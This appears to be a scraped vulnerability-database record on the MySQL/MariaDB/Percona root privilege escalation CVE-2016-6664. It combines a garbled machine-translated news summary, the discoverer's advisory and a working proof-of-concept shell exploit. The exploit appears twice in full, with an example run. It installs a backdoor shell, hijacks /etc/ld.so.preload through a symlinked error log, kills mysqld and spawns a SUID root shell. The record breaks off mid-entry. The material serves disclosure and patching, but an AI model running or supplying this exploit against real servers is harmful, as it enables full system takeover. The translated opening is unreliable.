\nMySQL version \n\n\nMySQL derived version: Percona Server, MariaDB \nVulnerability description \nElevation of Privilege/race condition Vulnerability(CVE-2 0 1 6-6 6 6 3) \nReleased this week, the two vulnerabilities, the more serious is race condition race condition\uff09vulnerability, it can allow a low-privileged account that has the CREATE/INSERT/SELECT privileges elevation of privilege and to the system user identity to execute arbitrary code. \nOnce the vulnerability be exploited, the hacker will be able to successfully get to the database server all database. \nRoot privilege escalation(CVE-2 0 1 6-6 6 6 4) \nAnother vulnerability is a root privilege escalation vulnerability this vulnerability allows with a MySQL user rights on the system an attacker to elevate privileges to root in order to further attack the entire system. \nCause the cause of the problem is actually because of the MySQL error log and other files is not secure enough, these files can be replaced with any of the system files, thus be exploited to obtain root privileges. \nThis vulnerability with the previously mentioned elevation of privilege vulnerability with the use of better flavor--hackers first use permission elevation Vulnerability(CVE-2 0 1 6-6 6 6 3)the ordinary user to System User, after the re-use of the root privilege elevation Vulnerability(CVE-2 0 1 6-6 6 6 4)to further enhance for the root user. \nAll of these vulnerabilities can be in a shared environment. In a shared environment, users can access independently of the database. And through these vulnerabilities, hackers can get to all the database permissions. \n\n\n## Vulnerability PoC\n\nGolunski has released two vulnerabilities PoC code: [exploit 1](<https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html>), the[vulnerability 2](<https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html>a).\n\nMySQL have fixed the two vulnerabilities, and in the last month of the quarterly update released the patch. \nSolution \nWe strongly advise webmasters to quickly install the patch, if you can not immediately install patches, can also be used a temporary solution--shut down the database server in the configuration of symbolic link support in my. cnf setting symbolic-links = 0 in. \n\n", "modified": "2016-11-05T00:00:00", "published": "2016-11-05T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/80901.htm", "id": "MYHACK58:62201680901", "type": "myhack58", "title": "MySQL is now a high-risk vulnerability that can cause the server root permission is stealing-vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-01-10T07:01:49", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-11-02T00:00:00", "type": "zdt", "title": "MySQL / MariaDB / PerconaDB - 'root' Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5617", "CVE-2016-6664"], "modified": "2016-11-02T00:00:00", "href": "https://0day.today/exploit/description/26205", "id": "1337DAY-ID-26205", "sourceData": "=============================================\r\n- Release date: 01.11.2016\r\n- Discovered by: Dawid Golunski\r\n- Severity: High\r\n- CVE-2016-6664 / OCVE-2016-5617\r\n- http://legalhackers.com\r\n=============================================\r\n \r\n \r\nI. VULNERABILITY\r\n-------------------------\r\n \r\nMariaDB / MySQL / PerconaDB - Root Privilege Escalation\r\n \r\nMySQL \r\n <= 5.5.51\r\n <= 5.6.32\r\n <= 5.7.14\r\n \r\nMariaDB\r\n All current\r\n \r\nPercona Server\r\n < 5.5.51-38.2\r\n < 5.6.32-78-1\r\n < 5.7.14-8\r\n \r\nPercona XtraDB Cluster\r\n < 5.6.32-25.17\r\n < 5.7.14-26.17\r\n < 5.5.41-37.0\r\n \r\n \r\nII. BACKGROUND\r\n-------------------------\r\n \r\nMySQL:\r\n \r\n\"MySQL is the world's most popular open source database.\r\nWhether you are a fast growing web property, technology ISV or large\r\nenterprise, MySQL can cost-effectively help you deliver high performance,\r\nscalable database applications.\"\r\n \r\n\"Many of the world's largest and fastest-growing organizations including\r\nFacebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time\r\nand money powering their high-volume Web sites, business-critical systems and\r\npackaged software.\"\r\n \r\nhttp://www.mysql.com/products/\r\nhttp://www.mysql.com/why-mysql/\r\n \r\n--\r\n \r\nMariaDB:\r\n \r\n\"MariaDB is one of the most popular database servers in the world. \r\nIt\u00e2\u20ac\u2122s made by the original developers of MySQL and guaranteed to stay open source. \r\nNotable users include Wikipedia, WordPress.com and Google.\r\n \r\nMariaDB turns data into structured information in a wide array of applications, \r\nranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. \r\nMariaDB is used because it is fast, scalable and robust, with a rich ecosystem of \r\nstorage engines, plugins and many other tools make it very versatile for a wide \r\nvariety of use cases.\"\r\n \r\nhttps://mariadb.org/about/\r\n \r\n--\r\n \r\nPerconaDB:\r\n \r\n\"Percona Server for MySQL is a free, fully compatible, enhanced, open source \r\ndrop-in replacement for MySQL that provides superior performance, scalability \r\nand instrumentation. \r\nWith over 3,000,000 downloads, Percona Server\u00e2\u20ac\u2122s self-tuning algorithms and support\r\nfor extremely high-performance hardware delivers excellent performance and reliability.\"\r\n \r\nhttps://www.percona.com/software/mysql-database/percona-server\r\n \r\n \r\nIII. INTRODUCTION\r\n-------------------------\r\n \r\nMySQL-based databases including MySQL, MariaDB and PerconaDB are affected\r\nby a privilege escalation vulnerability which can let attackers who have\r\ngained access to mysql system user to further escalate their privileges\r\nto root user allowing them to fully compromise the system.\r\nThe vulnerability stems from unsafe file handling of error logs and\r\nother files.\r\n \r\n \r\nIV. DESCRIPTION\r\n-------------------------\r\n \r\nThe error.log file on most default installations of MySQL/PerconaDB/MariaDB\r\ndatabases is stored either in /var/log/mysql or /var/lib/mysql directory.\r\n \r\nThe permissions on the file and directory look as follows:\r\n \r\n[email\u00a0protected]:/var/lib/mysql# ls -la /var/log/mysql\r\ntotal 468\r\ndrwxr-s--- 2 mysql adm 4096 Sep 11 06:25 .\r\ndrwxrwxr-x 36 root syslog 4096 Sep 11 06:25 ..\r\n-rw-r----- 1 mysql adm 0 Sep 11 06:25 error.log\r\n \r\n[email\u00a0protected]:/var/lib/mysql# ls -lad /var/log/mysql\r\ndrwxr-s--- 2 mysql adm 4096 Sep 11 06:25 /var/log/mysql\r\n \r\n \r\nmysqld_safe wrapper that is normally used for starting MySQL daemon and \r\ncreating/reopening the error.log performs certain unsafe file operations that\r\nmay allow attackers to gain root privileges.\r\n \r\nThe wrapper script contains a 'while' loop shown below which monitors the mysqld \r\nprocess and performs a restart in case of the process failure. \r\nThe restart involves re-creation of the error.log file if syslog logging has\r\nnot been configured instead of error log files (file-based logging is the \r\ndefault setting on most installations).\r\n \r\n \r\n--------[ mysqld_safe ]--------\r\n[...]\r\n \r\nwhile true\r\ndo\r\n rm -f \"$pid_file\" # Some extra safety\r\n \r\n start_time=`date +%M%S`\r\n \r\n eval_log_error \"$cmd\"\r\n \r\n if [ $want_syslog -eq 0 -a ! -f \"$err_log\" ]; then\r\n touch \"$err_log\" # hypothetical: log was renamed but not\r\n chown $user \"$err_log\" # flushed yet. we'd recreate it with\r\n chmod \"$fmode\" \"$err_log\" # wrong owner next time we log, so set\r\n fi # it up correctly while we can!\r\n \r\n[...]\r\n \r\n-------------------------------\r\n \r\nAs can be seen, the error.log file is created (touch) and chowned to the user\r\nrunning the mysqld daemon (typically 'mysql'). \r\n \r\nThe operation is vulnerable to a symlink attack.\r\n \r\nAttackers who obtained access to mysql account for example through CVE-2016-6663\r\nvulnerability described at:\r\n \r\nhttp://legalhackers.com/advisories/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-OCVE-2016-5616-Exploit.html\r\n \r\nwould gain access to /var/log or /var/lib/mysql directories (owned by mysql user) \r\nand could therefore easily remove the error.log file and replace it \r\nwith a symlink to an arbitrary system file which would result in creating in\r\narbitrary file on the system with mysql privileges and could be used to escalate\r\nprivileges.\r\n \r\nThe privilege escalation could be triggered instantly (without the need to wait\r\nfor mysql service restart/reboot) by attackers having 'mysql' account by simply \r\nkilling the mysqld child process (launched by the mysqld_safe wrapper).\r\n \r\nWhen the mysqld process gets terminated, the wrapper will then re-itertate the \r\nloop shown above and immediately create a mysql-owned file in the location \r\nspecified by the attacker in the symlink thus allowing attackers to quickly\r\nescalate their privileges.\r\n \r\n \r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n \r\n-------[ mysql-chowned.sh ]------\r\n \r\n#!/bin/bash -p\r\n#\r\n# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit\r\n# mysql-chowned.sh (ver. 1.0)\r\n#\r\n# CVE-2016-6664 / OCVE-2016-5617\r\n#\r\n# Discovered and coded by:\r\n#\r\n# Dawid Golunski\r\n# dawid[at]legalhackers.com\r\n#\r\n# http://legalhackers.com\r\n#\r\n#\r\n# This PoC exploit allows attackers to (instantly) escalate their privileges\r\n# from mysql system account to root through unsafe error log handling.\r\n# The exploit requires that file-based logging has been configured (default).\r\n# To confirm that syslog logging has not been enabled instead use:\r\n# grep -r syslog /etc/mysql\r\n# which should return no results.\r\n#\r\n# This exploit can be chained with the following vulnerability:\r\n# CVE-2016-6663 / OCVE-2016-5616\r\n# which allows attackers to gain access to mysql system account (mysql shell).\r\n#\r\n# In case database server has been configured with syslog you may also use:\r\n# CVE-2016-6662 as an alternative to this exploit.\r\n#\r\n# Usage:\r\n# ./mysql-chowned.sh path_to_error.log \r\n#\r\n# See full advisory for details at:\r\n#\r\n# http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html\r\n#\r\n# Disclaimer:\r\n# For testing purposes only. Do no harm.\r\n#\r\n \r\nBACKDOORSH=\"/bin/bash\"\r\nBACKDOORPATH=\"/tmp/mysqlrootsh\"\r\nPRIVESCLIB=\"/tmp/privesclib.so\"\r\nPRIVESCSRC=\"/tmp/privesclib.c\"\r\nSUIDBIN=\"/usr/bin/sudo\"\r\n \r\nfunction cleanexit {\r\n # Cleanup \r\n echo -e \"\\n[+] Cleaning up...\"\r\n rm -f $PRIVESCSRC\r\n rm -f $PRIVESCLIB\r\n rm -f $ERRORLOG\r\n touch $ERRORLOG\r\n if [ -f /etc/ld.so.preload ]; then\r\n echo -n > /etc/ld.so.preload\r\n fi\r\n echo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\r\n exit $1\r\n}\r\n \r\nfunction ctrl_c() {\r\n echo -e \"\\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\"\r\n cleanexit 0\r\n}\r\n \r\n#intro \r\necho -e \"\\033[94m \\nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \\nmysql-chowned.sh (ver. 1.0)\\n\\nCVE-2016-6664 / OCVE-2016-5617\\n\"\r\necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\"\r\n \r\n# Args\r\nif [ $# -lt 1 ]; then\r\n echo -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_error.log \\n\"\r\n echo -e \"It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\\n\"\r\n exit 3\r\nfi\r\n \r\n# Priv check\r\n \r\necho -e \"\\n[+] Starting the exploit as \\n\\033[94m`id`\\033[0m\"\r\nid | grep -q mysql \r\nif [ $? -ne 0 ]; then\r\n echo -e \"\\n[!] You need to execute the exploit as mysql user! Exiting.\\n\"\r\n exit 3\r\nfi\r\n \r\n# Set target paths\r\nERRORLOG=\"$1\"\r\nif [ ! -f $ERRORLOG ]; then\r\n echo -e \"\\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\\n\"\r\n exit 3\r\nfi\r\necho -e \"\\n[+] Target MySQL log file set to $ERRORLOG\"\r\n \r\n# [ Active exploitation ]\r\n \r\ntrap ctrl_c INT\r\n# Compile privesc preload library\r\necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\"\r\ncat <<_solibeof_>$PRIVESCSRC\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <dlfcn.h>\r\n #include <sys/types.h>\r\n #include <sys/stat.h>\r\n #include <fcntl.h>\r\n \r\nuid_t geteuid(void) {\r\n static uid_t (*old_geteuid)();\r\n old_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\r\n if ( old_geteuid() == 0 ) {\r\n chown(\"$BACKDOORPATH\", 0, 0);\r\n chmod(\"$BACKDOORPATH\", 04777);\r\n //unlink(\"/etc/ld.so.preload\");\r\n }\r\n return old_geteuid();\r\n}\r\n_solibeof_\r\n/bin/bash -c \"gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\"\r\nif [ $? -ne 0 ]; then\r\n echo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\r\n cleanexit 2;\r\nfi\r\n \r\n \r\n# Prepare backdoor shell\r\ncp $BACKDOORSH $BACKDOORPATH\r\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\"\r\n \r\n# Safety check\r\nif [ -f /etc/ld.so.preload ]; then\r\n echo -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\"\r\n exit 2\r\nfi\r\n \r\n# Symlink the log file to /etc\r\nrm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG\r\nif [ $? -ne 0 ]; then\r\n echo -e \"\\n[!] Couldn't remove the $ERRORLOG file or create a symlink.\"\r\n cleanexit 3\r\nfi\r\necho -e \"\\n[+] Symlink created at: \\n`ls -l $ERRORLOG`\"\r\n \r\n# Wait for MySQL to re-open the logs\r\necho -ne \"\\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\\n\"\r\nread -p \"Do you want to kill mysqld process to instantly get root? :) ? [y/n] \" THE_ANSWER\r\nif [ \"$THE_ANSWER\" = \"y\" ]; then\r\n echo -e \"Got it. Executing 'killall mysqld' now...\"\r\n killall mysqld\r\nfi\r\nwhile :; do \r\n sleep 0.1\r\n if [ -f /etc/ld.so.preload ]; then\r\n echo $PRIVESCLIB > /etc/ld.so.preload\r\n rm -f $ERRORLOG\r\n break;\r\n fi\r\ndone\r\n \r\n# /etc/ dir should be owned by mysql user at this point\r\n# Inject the privesc.so shared library to escalate privileges\r\necho $PRIVESCLIB > /etc/ld.so.preload\r\necho -e \"\\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \\n`ls -l /etc/ld.so.preload`\"\r\necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\r\necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\"\r\nchmod 755 /etc/ld.so.preload\r\n \r\n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\r\necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\r\nsudo 2>/dev/null >/dev/null\r\n \r\n#while :; do \r\n# sleep 0.1\r\n# ps aux | grep mysqld | grep -q 'log-error'\r\n# if [ $? -eq 0 ]; then\r\n# break;\r\n# fi\r\n#done\r\n \r\n# Check for the rootshell\r\nls -l $BACKDOORPATH\r\nls -l $BACKDOORPATH | grep rws | grep -q root\r\nif [ $? -eq 0 ]; then \r\n echo -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\"\r\n echo -e \"\\n\\033[94mGot root! The database server has been ch-OWNED !\\033[0m\"\r\nelse\r\n echo -e \"\\n[!] Failed to get root\"\r\n cleanexit 2\r\nfi\r\n \r\n \r\n# Execute the rootshell\r\necho -e \"\\n[+] Spawning the rootshell $BACKDOORPATH now! \\n\"\r\n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\r\n$BACKDOORPATH -p\r\n \r\n# Job done.\r\ncleanexit 0\r\n \r\n \r\n \r\n------------EOF------------------\r\n \r\n \r\nExample run\r\n~~~~~~~~~~~~~~~~\r\n \r\nmysql_suid_shell.MYD-4.3$ whoami\r\nmysql\r\n \r\nomysql_suid_shell.MYD-4.3$ dpkg -l | grep percona-server-server\r\niU percona-server-server 5.6.32-78.0-1.xenial amd64 Percona Server database server\r\niF percona-server-server-5.6 5.6.32-78.0-1.xenial amd64 Percona Server database server binaries\r\n \r\nmysql_suid_shell.MYD-4.3$ ./mysql-chowned.sh /var/lib/mysql/xenial-percona.err \r\n \r\nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \r\nmysql-chowned.sh (ver. 1.0)\r\n \r\nCVE-2016-6664 / OCVE-2016-5617\r\n \r\nDiscovered and coded by: \r\n \r\nDawid Golunski \r\nhttp://legalhackers.com \r\n \r\n[+] Starting the exploit as \r\nuid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker)\r\n \r\n[+] Target MySQL log file set to /var/lib/mysql/xenial-percona.err\r\n \r\n[+] Compiling the privesc shared library (/tmp/privesclib.c)\r\n \r\n[+] Backdoor/low-priv shell installed at: \r\n-rwxr-xr-x 1 mysql attacker 1037528 Nov 1 05:08 /tmp/mysqlrootsh\r\n \r\n[+] Symlink created at: \r\nlrwxrwxrwx 1 mysql attacker 18 Nov 1 05:08 /var/lib/mysql/xenial-percona.err -> /etc/ld.so.preload\r\n \r\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\r\nDo you want to kill mysqld process to instantly get root? :) ? [y/n] y\r\nGot it. Executing 'killall mysqld' now...\r\n \r\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \r\n-rw-r----- 1 mysql root 19 Nov 1 05:08 /etc/ld.so.preload\r\n \r\n[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload\r\n \r\n[+] The /etc/ld.so.preload file now contains: \r\n/tmp/privesclib.so\r\n \r\n[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!\r\n-rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh\r\n \r\n[+] Rootshell got assigned root SUID perms at: \r\n-rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh\r\n \r\nGot root! The database server has been ch-OWNED !\r\n \r\n[+] Spawning the rootshell /tmp/mysqlrootsh now! \r\n \r\nmysqlrootsh-4.3# whoami\r\nroot\r\n \r\nmysqlrootsh-4.3# exit\r\nexit\r\n \r\n[+] Cleaning up...\r\n \r\n[+] Job done. Exiting with code 0\r\n \r\n \r\n \r\nVideo PoC:\r\n~~~~~~~~~~~~~\r\n \r\nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\r\n \r\n \r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n \r\nAttackers who obtained mysql account through other vulnerabilities\r\n(such as CVE-2016-6663) could use this exploit to gain root access\r\nand fully compromise the system.\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n \r\nMySQL \r\n <= 5.5.51\r\n <= 5.6.32\r\n <= 5.7.14\r\n \r\nMariaDB\r\n All current\r\n \r\nPercona Server\r\n < 5.5.51-38.2\r\n < 5.6.32-78-1\r\n < 5.7.14-8\r\n \r\nPercona XtraDB Cluster\r\n < 5.6.32-25.17\r\n < 5.7.14-26.17\r\n < 5.5.41-37.0\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n \r\nVendors have released patches after private disclosure.\r\nUpdate to the latest version of your DBMS.\r\n \r\n \r\nIX. REFERENCES\r\n-------------------------\r\n \r\nhttp://legalhackers.com\r\n \r\nThis advisory:\r\nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html\r\n \r\nExploit source code:\r\nhttp://legalhackers.com/exploits/mysql-chowned.sh\r\n \r\nCVE-2016-6663 vulnerability which can allow attackers to obtain 'mysql' system account:\r\nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html\r\n \r\nVideo PoC:\r\nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\r\n \r\nCVE-2016-6664\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6664\r\n \r\nhttp://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/26205", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-11-02T13:29:37", "description": "MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation. CVE-2016-5617,CVE-2016-6664. Local exploit for Linux platform", "published": "2016-11-01T00:00:00", "type": "exploitdb", "title": "MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5617", "CVE-2016-6664"], "modified": "2016-11-01T00:00:00", "id": "EDB-ID:40679", "href": "https://www.exploit-db.com/exploits/40679/", "sourceData": "#!/bin/bash -p\r\n#\r\n# Source: https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh\r\n#\r\n# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit\r\n# mysql-chowned.sh (ver. 1.0)\r\n#\r\n# CVE-2016-6664 / OCVE-2016-5617\r\n#\r\n# Discovered and coded by:\r\n#\r\n# Dawid Golunski\r\n# dawid[at]legalhackers.com\r\n#\r\n# https://legalhackers.com\r\n#\r\n# Follow https://twitter.com/dawid_golunski for updates on this advisory.\r\n#\r\n# This PoC exploit allows attackers to (instantly) escalate their privileges\r\n# from mysql system account to root through unsafe error log handling.\r\n# The exploit requires that file-based logging has been configured (default).\r\n# To confirm that syslog logging has not been enabled instead use:\r\n# grep -r syslog /etc/mysql\r\n# which should return no results.\r\n#\r\n# This exploit can be chained with the following vulnerability:\r\n# CVE-2016-6663 / OCVE-2016-5616\r\n# which allows attackers to gain access to mysql system account (mysql shell).\r\n#\r\n# In case database server has been configured with syslog you may also use:\r\n# CVE-2016-6662 as an alternative to this exploit.\r\n#\r\n# Usage:\r\n# ./mysql-chowned.sh path_to_error.log \r\n#\r\n#\r\n# See the full advisory for details at:\r\n# https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html\r\n#\r\n# Video PoC:\r\n# https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\r\n#\r\n#\r\n# Disclaimer:\r\n# For testing purposes only. Do no harm.\r\n#\r\n\r\nBACKDOORSH=\"/bin/bash\"\r\nBACKDOORPATH=\"/tmp/mysqlrootsh\"\r\nPRIVESCLIB=\"/tmp/privesclib.so\"\r\nPRIVESCSRC=\"/tmp/privesclib.c\"\r\nSUIDBIN=\"/usr/bin/sudo\"\r\n\r\nfunction cleanexit {\r\n\t# Cleanup \r\n\techo -e \"\\n[+] Cleaning up...\"\r\n\trm -f $PRIVESCSRC\r\n\trm -f $PRIVESCLIB\r\n\trm -f $ERRORLOG\r\n\ttouch $ERRORLOG\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo -n > /etc/ld.so.preload\r\n\tfi\r\n\techo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\r\n\texit $1\r\n}\r\n\r\nfunction ctrl_c() {\r\n echo -e \"\\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\"\r\n\tcleanexit 0\r\n}\r\n\r\n#intro \r\necho -e \"\\033[94m \\nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \\nmysql-chowned.sh (ver. 1.0)\\n\\nCVE-2016-6664 / OCVE-2016-5617\\n\"\r\necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\"\r\n\r\n# Args\r\nif [ $# -lt 1 ]; then\r\n\techo -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_error.log \\n\"\r\n\techo -e \"It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\\n\"\r\n\texit 3\r\nfi\r\n\r\n# Priv check\r\n\r\necho -e \"\\n[+] Starting the exploit as \\n\\033[94m`id`\\033[0m\"\r\nid | grep -q mysql \r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] You need to execute the exploit as mysql user! Exiting.\\n\"\r\n\texit 3\r\nfi\r\n\r\n# Set target paths\r\nERRORLOG=\"$1\"\r\nif [ ! -f $ERRORLOG ]; then\r\n\techo -e \"\\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\\n\"\r\n\texit 3\r\nfi\r\necho -e \"\\n[+] Target MySQL log file set to $ERRORLOG\"\r\n\r\n# [ Active exploitation ]\r\n\r\ntrap ctrl_c INT\r\n# Compile privesc preload library\r\necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\"\r\ncat <<_solibeof_>$PRIVESCSRC\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <dlfcn.h>\r\n #include <sys/types.h>\r\n #include <sys/stat.h>\r\n #include <fcntl.h>\r\n\r\nuid_t geteuid(void) {\r\n\tstatic uid_t (*old_geteuid)();\r\n\told_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\r\n\tif ( old_geteuid() == 0 ) {\r\n\t\tchown(\"$BACKDOORPATH\", 0, 0);\r\n\t\tchmod(\"$BACKDOORPATH\", 04777);\r\n\t\t//unlink(\"/etc/ld.so.preload\");\r\n\t}\r\n\treturn old_geteuid();\r\n}\r\n_solibeof_\r\n/bin/bash -c \"gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\"\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\r\n\tcleanexit 2;\r\nfi\r\n\r\n\r\n# Prepare backdoor shell\r\ncp $BACKDOORSH $BACKDOORPATH\r\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\"\r\n\r\n# Safety check\r\nif [ -f /etc/ld.so.preload ]; then\r\n\techo -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\"\r\n\texit 2\r\nfi\r\n\r\n# Symlink the log file to /etc\r\nrm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Couldn't remove the $ERRORLOG file or create a symlink.\"\r\n\tcleanexit 3\r\nfi\r\necho -e \"\\n[+] Symlink created at: \\n`ls -l $ERRORLOG`\"\r\n\r\n# Wait for MySQL to re-open the logs\r\necho -ne \"\\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\\n\"\r\nread -p \"Do you want to kill mysqld process to instantly get root? :) ? [y/n] \" THE_ANSWER\r\nif [ \"$THE_ANSWER\" = \"y\" ]; then\r\n\techo -e \"Got it. Executing 'killall mysqld' now...\"\r\n\tkillall mysqld\r\nfi\r\nwhile :; do \r\n\tsleep 0.1\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo $PRIVESCLIB > /etc/ld.so.preload\r\n\t\trm -f $ERRORLOG\r\n\t\tbreak;\r\n\tfi\r\ndone\r\n\r\n# /etc/\tdir should be owned by mysql user at this point\r\n# Inject the privesc.so shared library to escalate privileges\r\necho $PRIVESCLIB > /etc/ld.so.preload\r\necho -e \"\\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \\n`ls -l /etc/ld.so.preload`\"\r\necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\r\necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\"\r\nchmod 755 /etc/ld.so.preload\r\n\r\n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\r\necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\r\nsudo 2>/dev/null >/dev/null\r\n\r\n#while :; do \r\n#\tsleep 0.1\r\n#\tps aux | grep mysqld | grep -q 'log-error'\r\n#\tif [ $? -eq 0 ]; then\r\n#\t\tbreak;\r\n#\tfi\r\n#done\r\n\r\n# Check for the rootshell\r\nls -l $BACKDOORPATH\r\nls -l $BACKDOORPATH | grep rws | grep -q root\r\nif [ $? -eq 0 ]; then \r\n\techo -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\"\r\n\techo -e \"\\n\\033[94mGot root! The database server has been ch-OWNED !\\033[0m\"\r\nelse\r\n\techo -e \"\\n[!] Failed to get root\"\r\n\tcleanexit 2\r\nfi\r\n\r\n\r\n# Execute the rootshell\r\necho -e \"\\n[+] Spawning the rootshell $BACKDOORPATH now! \\n\"\r\n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\r\n$BACKDOORPATH -p\r\n\r\n# Job done.\r\ncleanexit 0\r\n", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/40679/"}], "thn": [{"lastseen": "2018-01-27T09:18:02", "bulletinFamily": "info", "cvelist": ["CVE-2016-6663", "CVE-2016-6664", "CVE-2016-6662"], "description": "[](<https://3.bp.blogspot.com/-rNDG8RTtpzY/WBrtCaHmb7I/AAAAAAAAqEg/1Gzysgot1rgaEN4A8Upj1a8qqtBEUSihACLcB/s1600/mysql-zero-day-exploit-hacking.png>)\n\nOver a month ago we reported about [two critical zero-day vulnerabilities](<https://thehackernews.com/2016/09/hack-mysql-database.html>) in 